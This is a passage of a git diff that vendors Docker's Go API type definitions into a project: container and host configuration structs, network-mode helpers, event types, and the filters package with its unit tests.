+ AttachStdin bool // Attach the standard input, makes possible user interaction + AttachStderr bool // Attach the standard error + AttachStdout bool // Attach the standard output + Detach bool // Execute in detach mode + DetachKeys string // Escape keys for detach + Env []string // Environment variables + Cmd []string // Execution commands and args +} + +// PluginRmConfig holds arguments for plugin remove. +type PluginRmConfig struct { + ForceRemove bool +} + +// PluginEnableConfig holds arguments for plugin enable +type PluginEnableConfig struct { + Timeout int +} + +// PluginDisableConfig holds arguments for plugin disable. +type PluginDisableConfig struct { + ForceDisable bool +} diff --git a/vendor/github.com/docker/docker/api/types/container/config.go b/vendor/github.com/docker/docker/api/types/container/config.go new file mode 100644 index 0000000000..fc050e5dba --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/config.go @@ -0,0 +1,62 @@ +package container + +import ( + "time" + + "github.com/docker/docker/api/types/strslice" + "github.com/docker/go-connections/nat" +) + +// HealthConfig holds configuration settings for the HEALTHCHECK feature. +type HealthConfig struct { + // Test is the test to perform to check that the container is healthy. + // An empty slice means to inherit the default. + // The options are: + // {} : inherit healthcheck + // {"NONE"} : disable healthcheck + // {"CMD", args...} : exec arguments directly + // {"CMD-SHELL", command} : run command with system's default shell + Test []string `json:",omitempty"` + + // Zero means to inherit. Durations are expressed as integer nanoseconds. + Interval time.Duration `json:",omitempty"` // Interval is the time to wait between checks. + Timeout time.Duration `json:",omitempty"` // Timeout is the time to wait before considering the check to have hung. + + // Retries is the number of consecutive failures needed to consider a container as unhealthy. + // Zero means inherit. 
+ Retries int `json:",omitempty"` +} + +// Config contains the configuration data about a container. +// It should hold only portable information about the container. +// Here, "portable" means "independent from the host we are running on". +// Non-portable information *should* appear in HostConfig. +// All fields added to this struct must be marked `omitempty` to keep getting +// predictable hashes from the old `v1Compatibility` configuration. +type Config struct { + Hostname string // Hostname + Domainname string // Domainname + User string // User that will run the command(s) inside the container, also support user:group + AttachStdin bool // Attach the standard input, makes possible user interaction + AttachStdout bool // Attach the standard output + AttachStderr bool // Attach the standard error + ExposedPorts nat.PortSet `json:",omitempty"` // List of exposed ports + Tty bool // Attach standard streams to a tty, including stdin if it is not closed. + OpenStdin bool // Open stdin + StdinOnce bool // If true, close stdin after the 1 attached client disconnects. + Env []string // List of environment variable to set in the container + Cmd strslice.StrSlice // Command to run when starting the container + Healthcheck *HealthConfig `json:",omitempty"` // Healthcheck describes how to check the container is healthy + ArgsEscaped bool `json:",omitempty"` // True if command is already escaped (Windows specific) + Image string // Name of the image as it was passed by the operator (e.g. 
could be symbolic) + Volumes map[string]struct{} // List of volumes (mounts) used for the container + WorkingDir string // Current directory (PWD) in the command will be launched + Entrypoint strslice.StrSlice // Entrypoint to run when starting the container + NetworkDisabled bool `json:",omitempty"` // Is network disabled + MacAddress string `json:",omitempty"` // Mac Address of the container + OnBuild []string // ONBUILD metadata that were defined on the image Dockerfile + Labels map[string]string // List of labels set to this container + StopSignal string `json:",omitempty"` // Signal to stop a container + StopTimeout *int `json:",omitempty"` // Timeout (in seconds) to stop a container + Shell strslice.StrSlice `json:",omitempty"` // Shell for shell-form of RUN, CMD, ENTRYPOINT +} diff --git a/vendor/github.com/docker/docker/api/types/container/container_create.go b/vendor/github.com/docker/docker/api/types/container/container_create.go new file mode 100644 index 0000000000..d028e3b121 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/container_create.go @@ -0,0 +1,21 @@ +package container + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +// ContainerCreateCreatedBody container create created body +// swagger:model ContainerCreateCreatedBody +type ContainerCreateCreatedBody struct { + + // The ID of the created container + // Required: true + ID string `json:"Id"` + + // Warnings encountered when creating the container + // Required: true + Warnings []string `json:"Warnings"` +} diff --git a/vendor/github.com/docker/docker/api/types/container/container_update.go b/vendor/github.com/docker/docker/api/types/container/container_update.go new file mode 100644 index 0000000000..81ee12c678 --- /dev/null +++ 
b/vendor/github.com/docker/docker/api/types/container/container_update.go @@ -0,0 +1,17 @@ +package container + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +// ContainerUpdateOKBody container update o k body +// swagger:model ContainerUpdateOKBody +type ContainerUpdateOKBody struct { + + // warnings + // Required: true + Warnings []string `json:"Warnings"` +} diff --git a/vendor/github.com/docker/docker/api/types/container/container_wait.go b/vendor/github.com/docker/docker/api/types/container/container_wait.go new file mode 100644 index 0000000000..16cf335321 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/container_wait.go @@ -0,0 +1,17 @@ +package container + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +// ContainerWaitOKBody container wait o k body +// swagger:model ContainerWaitOKBody +type ContainerWaitOKBody struct { + + // Exit code of the container + // Required: true + StatusCode int64 `json:"StatusCode"` +} diff --git a/vendor/github.com/docker/docker/api/types/container/host_config.go b/vendor/github.com/docker/docker/api/types/container/host_config.go new file mode 100644 index 0000000000..0c82d625e8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/host_config.go @@ -0,0 +1,333 @@ +package container + +import ( + "strings" + + "github.com/docker/docker/api/types/blkiodev" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/go-connections/nat" + "github.com/docker/go-units" +) + 
+// NetworkMode represents the container network stack. +type NetworkMode string + +// Isolation represents the isolation technology of a container. The supported +// values are platform specific +type Isolation string + +// IsDefault indicates the default isolation technology of a container. On Linux this +// is the native driver. On Windows, this is a Windows Server Container. +func (i Isolation) IsDefault() bool { + return strings.ToLower(string(i)) == "default" || string(i) == "" +} + +// IpcMode represents the container ipc stack. +type IpcMode string + +// IsPrivate indicates whether the container uses its private ipc stack. +func (n IpcMode) IsPrivate() bool { + return !(n.IsHost() || n.IsContainer()) +} + +// IsHost indicates whether the container uses the host's ipc stack. +func (n IpcMode) IsHost() bool { + return n == "host" +} + +// IsContainer indicates whether the container uses a container's ipc stack. +func (n IpcMode) IsContainer() bool { + parts := strings.SplitN(string(n), ":", 2) + return len(parts) > 1 && parts[0] == "container" +} + +// Valid indicates whether the ipc stack is valid. +func (n IpcMode) Valid() bool { + parts := strings.Split(string(n), ":") + switch mode := parts[0]; mode { + case "", "host": + case "container": + if len(parts) != 2 || parts[1] == "" { + return false + } + default: + return false + } + return true +} + +// Container returns the name of the container ipc stack is going to be used. +func (n IpcMode) Container() string { + parts := strings.SplitN(string(n), ":", 2) + if len(parts) > 1 { + return parts[1] + } + return "" +} + +// UsernsMode represents userns mode in the container. +type UsernsMode string + +// IsHost indicates whether the container uses the host's userns. +func (n UsernsMode) IsHost() bool { + return n == "host" +} + +// IsPrivate indicates whether the container uses the a private userns. 
+func (n UsernsMode) IsPrivate() bool { + return !(n.IsHost()) +} + +// Valid indicates whether the userns is valid. +func (n UsernsMode) Valid() bool { + parts := strings.Split(string(n), ":") + switch mode := parts[0]; mode { + case "", "host": + default: + return false + } + return true +} + +// CgroupSpec represents the cgroup to use for the container. +type CgroupSpec string + +// IsContainer indicates whether the container is using another container cgroup +func (c CgroupSpec) IsContainer() bool { + parts := strings.SplitN(string(c), ":", 2) + return len(parts) > 1 && parts[0] == "container" +} + +// Valid indicates whether the cgroup spec is valid. +func (c CgroupSpec) Valid() bool { + return c.IsContainer() || c == "" +} + +// Container returns the name of the container whose cgroup will be used. +func (c CgroupSpec) Container() string { + parts := strings.SplitN(string(c), ":", 2) + if len(parts) > 1 { + return parts[1] + } + return "" +} + +// UTSMode represents the UTS namespace of the container. +type UTSMode string + +// IsPrivate indicates whether the container uses its private UTS namespace. +func (n UTSMode) IsPrivate() bool { + return !(n.IsHost()) +} + +// IsHost indicates whether the container uses the host's UTS namespace. +func (n UTSMode) IsHost() bool { + return n == "host" +} + +// Valid indicates whether the UTS namespace is valid. +func (n UTSMode) Valid() bool { + parts := strings.Split(string(n), ":") + switch mode := parts[0]; mode { + case "", "host": + default: + return false + } + return true +} + +// PidMode represents the pid namespace of the container. +type PidMode string + +// IsPrivate indicates whether the container uses its own new pid namespace. +func (n PidMode) IsPrivate() bool { + return !(n.IsHost() || n.IsContainer()) +} + +// IsHost indicates whether the container uses the host's pid namespace. 
+func (n PidMode) IsHost() bool { + return n == "host" +} + +// IsContainer indicates whether the container uses a container's pid namespace. +func (n PidMode) IsContainer() bool { + parts := strings.SplitN(string(n), ":", 2) + return len(parts) > 1 && parts[0] == "container" +} + +// Valid indicates whether the pid namespace is valid. +func (n PidMode) Valid() bool { + parts := strings.Split(string(n), ":") + switch mode := parts[0]; mode { + case "", "host": + case "container": + if len(parts) != 2 || parts[1] == "" { + return false + } + default: + return false + } + return true +} + +// Container returns the name of the container whose pid namespace is going to be used. +func (n PidMode) Container() string { + parts := strings.SplitN(string(n), ":", 2) + if len(parts) > 1 { + return parts[1] + } + return "" +} + +// DeviceMapping represents the device mapping between the host and the container. +type DeviceMapping struct { + PathOnHost string + PathInContainer string + CgroupPermissions string +} + +// RestartPolicy represents the restart policies of the container. +type RestartPolicy struct { + Name string + MaximumRetryCount int +} + +// IsNone indicates whether the container has the "no" restart policy. +// This means the container will not automatically restart when exiting. +func (rp *RestartPolicy) IsNone() bool { + return rp.Name == "no" || rp.Name == "" +} + +// IsAlways indicates whether the container has the "always" restart policy. +// This means the container will automatically restart regardless of the exit status. +func (rp *RestartPolicy) IsAlways() bool { + return rp.Name == "always" +} + +// IsOnFailure indicates whether the container has the "on-failure" restart policy. +// This means the container will automatically restart of exiting with a non-zero exit status. +func (rp *RestartPolicy) IsOnFailure() bool { + return rp.Name == "on-failure" +} + +// IsUnlessStopped indicates whether the container has the +// "unless-stopped" restart policy. 
This means the container will +// automatically restart unless user has put it to stopped state. +func (rp *RestartPolicy) IsUnlessStopped() bool { + return rp.Name == "unless-stopped" +} + +// IsSame compares two RestartPolicy to see if they are the same +func (rp *RestartPolicy) IsSame(tp *RestartPolicy) bool { + return rp.Name == tp.Name && rp.MaximumRetryCount == tp.MaximumRetryCount +} + +// LogConfig represents the logging configuration of the container. +type LogConfig struct { + Type string + Config map[string]string +} + +// Resources contains container's resources (cgroups config, ulimits...) +type Resources struct { + // Applicable to all platforms + CPUShares int64 `json:"CpuShares"` // CPU shares (relative weight vs. other containers) + Memory int64 // Memory limit (in bytes) + NanoCPUs int64 `json:"NanoCpus"` // CPU quota in units of 10-9 CPUs. + + // Applicable to UNIX platforms + CgroupParent string // Parent cgroup. + BlkioWeight uint16 // Block IO weight (relative weight vs. 
other containers) + BlkioWeightDevice []*blkiodev.WeightDevice + BlkioDeviceReadBps []*blkiodev.ThrottleDevice + BlkioDeviceWriteBps []*blkiodev.ThrottleDevice + BlkioDeviceReadIOps []*blkiodev.ThrottleDevice + BlkioDeviceWriteIOps []*blkiodev.ThrottleDevice + CPUPeriod int64 `json:"CpuPeriod"` // CPU CFS (Completely Fair Scheduler) period + CPUQuota int64 `json:"CpuQuota"` // CPU CFS (Completely Fair Scheduler) quota + CPURealtimePeriod int64 `json:"CpuRealtimePeriod"` // CPU real-time period + CPURealtimeRuntime int64 `json:"CpuRealtimeRuntime"` // CPU real-time runtime + CpusetCpus string // CpusetCpus 0-2, 0,1 + CpusetMems string // CpusetMems 0-2, 0,1 + Devices []DeviceMapping // List of devices to map inside the container + DiskQuota int64 // Disk limit (in bytes) + KernelMemory int64 // Kernel memory limit (in bytes) + MemoryReservation int64 // Memory soft limit (in bytes) + MemorySwap int64 // Total memory usage (memory + swap); set `-1` to enable unlimited swap + MemorySwappiness *int64 // Tuning container memory swappiness behaviour + OomKillDisable *bool // Whether to disable OOM Killer or not + PidsLimit int64 // Setting pids limit for a container + Ulimits []*units.Ulimit // List of ulimits to be set in the container + + // Applicable to Windows + CPUCount int64 `json:"CpuCount"` // CPU count + CPUPercent int64 `json:"CpuPercent"` // CPU percent + IOMaximumIOps uint64 // Maximum IOps for the container system drive + IOMaximumBandwidth uint64 // Maximum IO in bytes per second for the container system drive +} + +// UpdateConfig holds the mutable attributes of a Container. +// Those attributes can be updated at runtime. +type UpdateConfig struct { + // Contains container's resources (cgroups, ulimits) + Resources + RestartPolicy RestartPolicy +} + +// HostConfig the non-portable Config structure of a container. +// Here, "non-portable" means "dependent of the host we are running on". +// Portable information *should* appear in Config. 
+type HostConfig struct { + // Applicable to all platforms + Binds []string // List of volume bindings for this container + ContainerIDFile string // File (path) where the containerId is written + LogConfig LogConfig // Configuration of the logs for this container + NetworkMode NetworkMode // Network mode to use for the container + PortBindings nat.PortMap // Port mapping between the exposed port (container) and the host + RestartPolicy RestartPolicy // Restart policy to be used for the container + AutoRemove bool // Automatically remove container when it exits + VolumeDriver string // Name of the volume driver used to mount volumes + VolumesFrom []string // List of volumes to take from other container + + // Applicable to UNIX platforms + CapAdd strslice.StrSlice // List of kernel capabilities to add to the container + CapDrop strslice.StrSlice // List of kernel capabilities to remove from the container + DNS []string `json:"Dns"` // List of DNS server to lookup + DNSOptions []string `json:"DnsOptions"` // List of DNSOption to look for + DNSSearch []string `json:"DnsSearch"` // List of DNSSearch to look for + ExtraHosts []string // List of extra hosts + GroupAdd []string // List of additional groups that the container process will run as + IpcMode IpcMode // IPC namespace to use for the container + Cgroup CgroupSpec // Cgroup to use for the container + Links []string // List of links (in the name:alias form) + OomScoreAdj int // Container preference for OOM-killing + PidMode PidMode // PID namespace to use for the container + Privileged bool // Is the container in privileged mode + PublishAllPorts bool // Should docker publish all exposed port for the container + ReadonlyRootfs bool // Is the container root filesystem in read-only + SecurityOpt []string // List of string values to customize labels for MLS systems, such as SELinux. + StorageOpt map[string]string `json:",omitempty"` // Storage driver options per container. 
+ Tmpfs map[string]string `json:",omitempty"` // List of tmpfs (mounts) used for the container + UTSMode UTSMode // UTS namespace to use for the container + UsernsMode UsernsMode // The user namespace to use for the container + ShmSize int64 // Total shm memory usage + Sysctls map[string]string `json:",omitempty"` // List of Namespaced sysctls used for the container + Runtime string `json:",omitempty"` // Runtime to use with this container + + // Applicable to Windows + ConsoleSize [2]uint // Initial console size (height,width) + Isolation Isolation // Isolation technology of the container (eg default, hyperv) + + // Contains container's resources (cgroups, ulimits) + Resources + + // Mounts specs used by the container + Mounts []mount.Mount `json:",omitempty"` + + // Run a custom init inside the container, if null, use the daemon's configured settings + Init *bool `json:",omitempty"` + + // Custom init path + InitPath string `json:",omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go b/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go new file mode 100644 index 0000000000..9fb79bed6f --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/hostconfig_unix.go @@ -0,0 +1,81 @@ +// +build !windows + +package container + +import "strings" + +// IsValid indicates if an isolation technology is valid +func (i Isolation) IsValid() bool { + return i.IsDefault() +} + +// IsPrivate indicates whether container uses its private network stack. +func (n NetworkMode) IsPrivate() bool { + return !(n.IsHost() || n.IsContainer()) +} + +// IsDefault indicates whether container uses the default network stack. +func (n NetworkMode) IsDefault() bool { + return n == "default" +} + +// NetworkName returns the name of the network stack. 
+func (n NetworkMode) NetworkName() string { + if n.IsBridge() { + return "bridge" + } else if n.IsHost() { + return "host" + } else if n.IsContainer() { + return "container" + } else if n.IsNone() { + return "none" + } else if n.IsDefault() { + return "default" + } else if n.IsUserDefined() { + return n.UserDefined() + } + return "" +} + +// IsBridge indicates whether container uses the bridge network stack +func (n NetworkMode) IsBridge() bool { + return n == "bridge" +} + +// IsHost indicates whether container uses the host network stack. +func (n NetworkMode) IsHost() bool { + return n == "host" +} + +// IsContainer indicates whether container uses a container network stack. +func (n NetworkMode) IsContainer() bool { + parts := strings.SplitN(string(n), ":", 2) + return len(parts) > 1 && parts[0] == "container" +} + +// IsNone indicates whether container isn't using a network stack. +func (n NetworkMode) IsNone() bool { + return n == "none" +} + +// ConnectedContainer is the id of the container which network this container is connected to. 
+func (n NetworkMode) ConnectedContainer() string { + parts := strings.SplitN(string(n), ":", 2) + if len(parts) > 1 { + return parts[1] + } + return "" +} + +// IsUserDefined indicates user-created network +func (n NetworkMode) IsUserDefined() bool { + return !n.IsDefault() && !n.IsBridge() && !n.IsHost() && !n.IsNone() && !n.IsContainer() +} + +//UserDefined indicates user-created network +func (n NetworkMode) UserDefined() string { + if n.IsUserDefined() { + return string(n) + } + return "" +} diff --git a/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go b/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go new file mode 100644 index 0000000000..0ee332ba68 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/container/hostconfig_windows.go @@ -0,0 +1,87 @@ +package container + +import ( + "strings" +) + +// IsDefault indicates whether container uses the default network stack. +func (n NetworkMode) IsDefault() bool { + return n == "default" +} + +// IsNone indicates whether container isn't using a network stack. +func (n NetworkMode) IsNone() bool { + return n == "none" +} + +// IsContainer indicates whether container uses a container network stack. +// Returns false as windows doesn't support this mode +func (n NetworkMode) IsContainer() bool { + return false +} + +// IsBridge indicates whether container uses the bridge network stack +// in windows it is given the name NAT +func (n NetworkMode) IsBridge() bool { + return n == "nat" +} + +// IsHost indicates whether container uses the host network stack. +// returns false as this is not supported by windows +func (n NetworkMode) IsHost() bool { + return false +} + +// IsPrivate indicates whether container uses its private network stack. +func (n NetworkMode) IsPrivate() bool { + return !(n.IsHost() || n.IsContainer()) +} + +// ConnectedContainer is the id of the container which network this container is connected to. 
+// Returns blank string on windows +func (n NetworkMode) ConnectedContainer() string { + return "" +} + +// IsUserDefined indicates user-created network +func (n NetworkMode) IsUserDefined() bool { + return !n.IsDefault() && !n.IsNone() && !n.IsBridge() +} + +// IsHyperV indicates the use of a Hyper-V partition for isolation +func (i Isolation) IsHyperV() bool { + return strings.ToLower(string(i)) == "hyperv" +} + +// IsProcess indicates the use of process isolation +func (i Isolation) IsProcess() bool { + return strings.ToLower(string(i)) == "process" +} + +// IsValid indicates if an isolation technology is valid +func (i Isolation) IsValid() bool { + return i.IsDefault() || i.IsHyperV() || i.IsProcess() +} + +// NetworkName returns the name of the network stack. +func (n NetworkMode) NetworkName() string { + if n.IsDefault() { + return "default" + } else if n.IsBridge() { + return "nat" + } else if n.IsNone() { + return "none" + } else if n.IsUserDefined() { + return n.UserDefined() + } + + return "" +} + +//UserDefined indicates user-created network +func (n NetworkMode) UserDefined() string { + if n.IsUserDefined() { + return string(n) + } + return "" +} diff --git a/vendor/github.com/docker/docker/api/types/error_response.go b/vendor/github.com/docker/docker/api/types/error_response.go new file mode 100644 index 0000000000..dc942d9d9e --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/error_response.go @@ -0,0 +1,13 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// ErrorResponse Represents an error. +// swagger:model ErrorResponse +type ErrorResponse struct { + + // The error message. 
+ // Required: true + Message string `json:"message"` +} diff --git a/vendor/github.com/docker/docker/api/types/events/events.go b/vendor/github.com/docker/docker/api/types/events/events.go new file mode 100644 index 0000000000..7129a65acf --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/events/events.go @@ -0,0 +1,42 @@ +package events + +const ( + // ContainerEventType is the event type that containers generate + ContainerEventType = "container" + // DaemonEventType is the event type that daemon generate + DaemonEventType = "daemon" + // ImageEventType is the event type that images generate + ImageEventType = "image" + // NetworkEventType is the event type that networks generate + NetworkEventType = "network" + // PluginEventType is the event type that plugins generate + PluginEventType = "plugin" + // VolumeEventType is the event type that volumes generate + VolumeEventType = "volume" +) + +// Actor describes something that generates events, +// like a container, or a network, or a volume. +// It has a defined name and a set or attributes. +// The container attributes are its labels, other actors +// can generate these attributes from other properties. +type Actor struct { + ID string + Attributes map[string]string +} + +// Message represents the information an event contains +type Message struct { + // Deprecated information from JSONMessage. + // With data only in container events. 
+ Status string `json:"status,omitempty"` + ID string `json:"id,omitempty"` + From string `json:"from,omitempty"` + + Type string + Action string + Actor Actor + + Time int64 `json:"time,omitempty"` + TimeNano int64 `json:"timeNano,omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/filters/parse.go b/vendor/github.com/docker/docker/api/types/filters/parse.go new file mode 100644 index 0000000000..e01a41deb8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/filters/parse.go @@ -0,0 +1,310 @@ +// Package filters provides helper function to parse and handle command line +// filter, used for example in docker ps or docker images commands. +package filters + +import ( + "encoding/json" + "errors" + "fmt" + "regexp" + "strings" + + "github.com/docker/docker/api/types/versions" +) + +// Args stores filter arguments as map key:{map key: bool}. +// It contains an aggregation of the map of arguments (which are in the form +// of -f 'key=value') based on the key, and stores values for the same key +// in a map with string keys and boolean values. +// e.g given -f 'label=label1=1' -f 'label=label2=2' -f 'image.name=ubuntu' +// the args will be {"image.name":{"ubuntu":true},"label":{"label1=1":true,"label2=2":true}} +type Args struct { + fields map[string]map[string]bool +} + +// NewArgs initializes a new Args struct. +func NewArgs() Args { + return Args{fields: map[string]map[string]bool{}} +} + +// ParseFlag parses the argument to the filter flag. Like +// +// `docker ps -f 'created=today' -f 'image.name=ubuntu*'` +// +// If prev map is provided, then it is appended to, and returned. By default a new +// map is created. 
+func ParseFlag(arg string, prev Args) (Args, error) { + filters := prev + if len(arg) == 0 { + return filters, nil + } + + if !strings.Contains(arg, "=") { + return filters, ErrBadFormat + } + + f := strings.SplitN(arg, "=", 2) + + name := strings.ToLower(strings.TrimSpace(f[0])) + value := strings.TrimSpace(f[1]) + + filters.Add(name, value) + + return filters, nil +} + +// ErrBadFormat is an error returned in case of bad format for a filter. +var ErrBadFormat = errors.New("bad format of filter (expected name=value)") + +// ToParam packs the Args into a string for easy transport from client to server. +func ToParam(a Args) (string, error) { + // this way we don't URL encode {}, just empty space + if a.Len() == 0 { + return "", nil + } + + buf, err := json.Marshal(a.fields) + if err != nil { + return "", err + } + return string(buf), nil +} + +// ToParamWithVersion packs the Args into a string for easy transport from client to server. +// The generated string will depend on the specified version (corresponding to the API version). +func ToParamWithVersion(version string, a Args) (string, error) { + // this way we don't URL encode {}, just empty space + if a.Len() == 0 { + return "", nil + } + + // for daemons older than v1.10, filter must be of the form map[string][]string + buf := []byte{} + err := errors.New("") + if version != "" && versions.LessThan(version, "1.22") { + buf, err = json.Marshal(convertArgsToSlice(a.fields)) + } else { + buf, err = json.Marshal(a.fields) + } + if err != nil { + return "", err + } + return string(buf), nil +} + +// FromParam unpacks the filter Args. +func FromParam(p string) (Args, error) { + if len(p) == 0 { + return NewArgs(), nil + } + + r := strings.NewReader(p) + d := json.NewDecoder(r) + + m := map[string]map[string]bool{} + if err := d.Decode(&m); err != nil { + r.Seek(0, 0) + + // Allow parsing old arguments in slice format. + // Because other libraries might be sending them in this format. 
+ deprecated := map[string][]string{} + if deprecatedErr := d.Decode(&deprecated); deprecatedErr == nil { + m = deprecatedArgs(deprecated) + } else { + return NewArgs(), err + } + } + return Args{m}, nil +} + +// Get returns the list of values associates with a field. +// It returns a slice of strings to keep backwards compatibility with old code. +func (filters Args) Get(field string) []string { + values := filters.fields[field] + if values == nil { + return make([]string, 0) + } + slice := make([]string, 0, len(values)) + for key := range values { + slice = append(slice, key) + } + return slice +} + +// Add adds a new value to a filter field. +func (filters Args) Add(name, value string) { + if _, ok := filters.fields[name]; ok { + filters.fields[name][value] = true + } else { + filters.fields[name] = map[string]bool{value: true} + } +} + +// Del removes a value from a filter field. +func (filters Args) Del(name, value string) { + if _, ok := filters.fields[name]; ok { + delete(filters.fields[name], value) + if len(filters.fields[name]) == 0 { + delete(filters.fields, name) + } + } +} + +// Len returns the number of fields in the arguments. +func (filters Args) Len() int { + return len(filters.fields) +} + +// MatchKVList returns true if the values for the specified field matches the ones +// from the sources. +// e.g. given Args are {'label': {'label1=1','label2=1'}, 'image.name', {'ubuntu'}}, +// field is 'label' and sources are {'label1': '1', 'label2': '2'} +// it returns true. 
+func (filters Args) MatchKVList(field string, sources map[string]string) bool { + fieldValues := filters.fields[field] + + //do not filter if there is no filter set or cannot determine filter + if len(fieldValues) == 0 { + return true + } + + if len(sources) == 0 { + return false + } + + for name2match := range fieldValues { + testKV := strings.SplitN(name2match, "=", 2) + + v, ok := sources[testKV[0]] + if !ok { + return false + } + if len(testKV) == 2 && testKV[1] != v { + return false + } + } + + return true +} + +// Match returns true if the values for the specified field matches the source string +// e.g. given Args are {'label': {'label1=1','label2=1'}, 'image.name', {'ubuntu'}}, +// field is 'image.name' and source is 'ubuntu' +// it returns true. +func (filters Args) Match(field, source string) bool { + if filters.ExactMatch(field, source) { + return true + } + + fieldValues := filters.fields[field] + for name2match := range fieldValues { + match, err := regexp.MatchString(name2match, source) + if err != nil { + continue + } + if match { + return true + } + } + return false +} + +// ExactMatch returns true if the source matches exactly one of the filters. +func (filters Args) ExactMatch(field, source string) bool { + fieldValues, ok := filters.fields[field] + //do not filter if there is no filter set or cannot determine filter + if !ok || len(fieldValues) == 0 { + return true + } + + // try to match full name value to avoid O(N) regular expression matching + return fieldValues[source] +} + +// UniqueExactMatch returns true if there is only one filter and the source matches exactly this one. 
+func (filters Args) UniqueExactMatch(field, source string) bool { + fieldValues := filters.fields[field] + //do not filter if there is no filter set or cannot determine filter + if len(fieldValues) == 0 { + return true + } + if len(filters.fields[field]) != 1 { + return false + } + + // try to match full name value to avoid O(N) regular expression matching + return fieldValues[source] +} + +// FuzzyMatch returns true if the source matches exactly one of the filters, +// or the source has one of the filters as a prefix. +func (filters Args) FuzzyMatch(field, source string) bool { + if filters.ExactMatch(field, source) { + return true + } + + fieldValues := filters.fields[field] + for prefix := range fieldValues { + if strings.HasPrefix(source, prefix) { + return true + } + } + return false +} + +// Include returns true if the name of the field to filter is in the filters. +func (filters Args) Include(field string) bool { + _, ok := filters.fields[field] + return ok +} + +// Validate ensures that all the fields in the filter are valid. +// It returns an error as soon as it finds an invalid field. +func (filters Args) Validate(accepted map[string]bool) error { + for name := range filters.fields { + if !accepted[name] { + return fmt.Errorf("Invalid filter '%s'", name) + } + } + return nil +} + +// WalkValues iterates over the list of filtered values for a field. +// It stops the iteration if it finds an error and it returns that error. 
+func (filters Args) WalkValues(field string, op func(value string) error) error { + if _, ok := filters.fields[field]; !ok { + return nil + } + for v := range filters.fields[field] { + if err := op(v); err != nil { + return err + } + } + return nil +} + +func deprecatedArgs(d map[string][]string) map[string]map[string]bool { + m := map[string]map[string]bool{} + for k, v := range d { + values := map[string]bool{} + for _, vv := range v { + values[vv] = true + } + m[k] = values + } + return m +} + +func convertArgsToSlice(f map[string]map[string]bool) map[string][]string { + m := map[string][]string{} + for k, v := range f { + values := []string{} + for kk := range v { + if v[kk] { + values = append(values, kk) + } + } + m[k] = values + } + return m +} diff --git a/vendor/github.com/docker/docker/api/types/filters/parse_test.go b/vendor/github.com/docker/docker/api/types/filters/parse_test.go new file mode 100644 index 0000000000..b2ed27b9ce --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/filters/parse_test.go @@ -0,0 +1,417 @@ +package filters + +import ( + "fmt" + "testing" +) + +func TestParseArgs(t *testing.T) { + // equivalent of `docker ps -f 'created=today' -f 'image.name=ubuntu*' -f 'image.name=*untu'` + flagArgs := []string{ + "created=today", + "image.name=ubuntu*", + "image.name=*untu", + } + var ( + args = NewArgs() + err error + ) + for i := range flagArgs { + args, err = ParseFlag(flagArgs[i], args) + if err != nil { + t.Errorf("failed to parse %s: %s", flagArgs[i], err) + } + } + if len(args.Get("created")) != 1 { + t.Errorf("failed to set this arg") + } + if len(args.Get("image.name")) != 2 { + t.Errorf("the args should have collapsed") + } +} + +func TestParseArgsEdgeCase(t *testing.T) { + var filters Args + args, err := ParseFlag("", filters) + if err != nil { + t.Fatal(err) + } + if args.Len() != 0 { + t.Fatalf("Expected an empty Args (map), got %v", args) + } + if args, err = ParseFlag("anything", args); err == nil || err != 
ErrBadFormat { + t.Fatalf("Expected ErrBadFormat, got %v", err) + } +} + +func TestToParam(t *testing.T) { + fields := map[string]map[string]bool{ + "created": {"today": true}, + "image.name": {"ubuntu*": true, "*untu": true}, + } + a := Args{fields: fields} + + _, err := ToParam(a) + if err != nil { + t.Errorf("failed to marshal the filters: %s", err) + } +} + +func TestToParamWithVersion(t *testing.T) { + fields := map[string]map[string]bool{ + "created": {"today": true}, + "image.name": {"ubuntu*": true, "*untu": true}, + } + a := Args{fields: fields} + + str1, err := ToParamWithVersion("1.21", a) + if err != nil { + t.Errorf("failed to marshal the filters with version < 1.22: %s", err) + } + str2, err := ToParamWithVersion("1.22", a) + if err != nil { + t.Errorf("failed to marshal the filters with version >= 1.22: %s", err) + } + if str1 != `{"created":["today"],"image.name":["*untu","ubuntu*"]}` && + str1 != `{"created":["today"],"image.name":["ubuntu*","*untu"]}` { + t.Errorf("incorrectly marshaled the filters: %s", str1) + } + if str2 != `{"created":{"today":true},"image.name":{"*untu":true,"ubuntu*":true}}` && + str2 != `{"created":{"today":true},"image.name":{"ubuntu*":true,"*untu":true}}` { + t.Errorf("incorrectly marshaled the filters: %s", str2) + } +} + +func TestFromParam(t *testing.T) { + invalids := []string{ + "anything", + "['a','list']", + "{'key': 'value'}", + `{"key": "value"}`, + } + valid := map[*Args][]string{ + &Args{fields: map[string]map[string]bool{"key": {"value": true}}}: { + `{"key": ["value"]}`, + `{"key": {"value": true}}`, + }, + &Args{fields: map[string]map[string]bool{"key": {"value1": true, "value2": true}}}: { + `{"key": ["value1", "value2"]}`, + `{"key": {"value1": true, "value2": true}}`, + }, + &Args{fields: map[string]map[string]bool{"key1": {"value1": true}, "key2": {"value2": true}}}: { + `{"key1": ["value1"], "key2": ["value2"]}`, + `{"key1": 